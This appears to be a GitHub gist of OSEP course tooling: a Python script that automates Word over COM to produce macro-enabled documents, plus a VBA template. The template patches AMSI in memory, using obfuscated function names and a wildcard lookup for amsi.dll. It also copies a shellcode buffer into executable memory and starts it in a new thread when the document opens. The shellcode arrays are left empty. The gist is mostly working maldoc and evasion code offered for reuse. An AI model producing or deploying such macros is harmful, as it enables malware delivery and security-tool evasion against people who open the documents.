Last active
December 2, 2025 12:05
-
-
Save Klepvink/f2af78598f9930430e343000e95ccbe7 to your computer and use it in GitHub Desktop.
[OSEP] Word Macro Generator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The template.vba file included is quite literally https://github.com/Octoberfest7/OSEP-Tools/blob/main/WordMacroRunner, but without the AV-sandbox detection. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # I think this package is included in many of the tools we'd use? If not, pip install pywin32 | |
| import win32com.client as win32 | |
| # Grabs the contents of template.vba, and puts those in your Word document. The template in this gist contains an AMSI-bypass shellcode runner (because OSEP), but put whatever you want in there go nuts. | |
| macro_code = open("template.vba", "r").read() | |
| # Alright, this requires some settings changes in Word, as it does some COM-communication. | |
| # In Word, go to File -> Options -> Trust Center -> Trust Center Settings... -> Macro Settings -> Enable "Trust access to the VBA project object model" | |
| # Save and exit, should work fine. | |
| word = win32.Dispatch("Word.Application") | |
| word.Visible = False | |
| doc = word.Documents.Add() | |
| selection = word.Selection | |
| # The contents of your Word document | |
| selection.TypeText("Test!") | |
| vb_project = doc.VBProject | |
| vb_components = vb_project.VBComponents | |
| module = vb_components.Add(1) | |
| module.CodeModule.AddFromString(macro_code) | |
| # You'd probably want to change this | |
| output_path = r"Tools\\Payloads\\example.doc" | |
| # File format 13 is apparently a Macro-enabled Word document. | |
| doc.SaveAs(output_path, FileFormat=13) | |
| doc.Close(False) | |
| word.Quit() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Type MODULEINFO | |
| lpBaseOfDLL As Long | |
| SizeOfImage As Long | |
| EntryPoint As Long | |
| End Type | |
| Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long | |
| Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr | |
| Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr | |
| Private Declare PtrSafe Function GetPrAddr Lib "KERNEL32" Alias "GetProcAddress" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Function VirtPro Lib "KERNEL32" Alias "VirtualProtect" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProcess As LongPtr, lpflOldProtect As LongPtr) As LongPtr | |
| Private Declare PtrSafe Function getmod Lib "KERNEL32" Alias "GetModuleHandleA" (ByVal lpLibFileName As String) As LongPtr | |
| Private Declare PtrSafe Sub patched Lib "KERNEL32" Alias "RtlFillMemory" (Destination As Any, ByVal Length As Long, ByVal Fill As Byte) | |
| Public Declare PtrSafe Function EnumProcessModulesEx Lib "psapi.dll" (ByVal hProcess As LongPtr, lphModule As LongPtr, ByVal cb As LongPtr, lpcbNeeded As LongPtr, ByVal dwFilterFlag As LongPtr) As LongPtr | |
| Public Declare PtrSafe Function GetModuleBaseName Lib "psapi.dll" Alias "GetModuleBaseNameA" (ByVal hProcess As LongPtr, ByVal hModule As LongPtr, ByVal lpFileName As String, ByVal nSize As LongPtr) As LongPtr | |
| Function MyMacro() | |
| Dim Is64 As Boolean | |
| Dim StrFile As String | |
| Dim check As Boolean | |
| Dim buf As Variant | |
| Dim addr As LongPtr | |
| Dim counter As LongPtr | |
| Dim data As String | |
| Dim res As LongPtr | |
| Dim ipcheck As Boolean | |
| ipcheck = False | |
| Dim inscope As String | |
| inscope = "192.168.*" | |
| ipcheck = getMyIP(inscope) | |
| StrFile = Dir("c:\windows\system32\a?s?.d*") | |
| Is64 = arch() | |
| check = Tru | |
| If check Then | |
| patch StrFile, Is64 | |
| End If | |
| If Is64 Then | |
| buf = Array() | |
| Else | |
| buf = Array() | |
| End If | |
| addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) | |
| For counter = LBound(buf) To UBound(buf) | |
| data = Hex(buf(counter)) | |
| patched ByVal (addr + counter), 1, ByVal ("&H" & data) | |
| Next counter | |
| res = CreateThread(0, 0, addr, 0, 0, 0) | |
| End Function | |
| Function arch() As Boolean | |
| #If Win64 Then | |
| arch = True | |
| #Else | |
| arch = False | |
| #End If | |
| End Function | |
| Public Function getMyIP(ipcheck As String) As Boolean | |
| Dim objWMI As Object | |
| Dim objQuery As Object | |
| Dim objQueryItem As Object | |
| Dim vIpAddress | |
| Dim counter As Integer | |
| Dim ips() As String | |
| Set objWMI = GetObject("winmgmts:\\.\root\cimv2") | |
| Set objQuery = objWMI.ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled = True") | |
| For Each objQueryItem In objQuery | |
| For Each vIpAddress In objQueryItem.ipaddress | |
| If CStr(vIpAddress) Like ipcheck Then | |
| getMyIP = True | |
| End If | |
| Next | |
| Next | |
| End Function | |
| Function amcheck(StrFile As String) As Boolean | |
| Dim szProcessName As String | |
| Dim mdi As MODULEINFO | |
| Dim hMod(0 To 1023) As LongPtr | |
| Dim res As LongPtr | |
| amcheck = False | |
| res = EnumProcessModulesEx(-1, hMod(0), 1024, cbNeeded, &H3) | |
| For i = 0 To UBound(hMod) | |
| szProcessName = String$(50, 0) | |
| GetModuleBaseName -1, hMod(i), szProcessName, Len(szProcessName) | |
| If Left(szProcessName, 8) = StrFile Then | |
| amcheck = True | |
| End If | |
| Next i | |
| End Function | |
| Function patch(StrFile As String, Is64 As Boolean) | |
| Dim lib As LongPtr | |
| Dim Func_addr As LongPtr | |
| Dim temp As LongPtr | |
| Dim old As LongPtr | |
| Dim off As Integer | |
| lib = getmod(StrFile) | |
| If Is64 Then | |
| off = 96 | |
| Else | |
| off = 80 | |
| End If | |
| Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off | |
| temp = VirtPro(ByVal Func_addr, 32, 64, 0) | |
| patched ByVal (Func_addr), 1, ByVal ("&H" & "90") | |
| patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3") | |
| temp = VirtPro(ByVal Func_addr, 32, old, 0) | |
| If Is64 Then | |
| off = 352 | |
| Else | |
| off = 256 | |
| End If | |
| Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off | |
| temp = VirtPro(ByVal Func_addr, 32, 64, old) | |
| patched ByVal (Func_addr), 1, ByVal ("&H" & "90") | |
| patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3") | |
| temp = VirtPro(ByVal Func_addr, 32, old, 0) | |
| End Function | |
| Sub AutoOpen() | |
| MyMacro | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment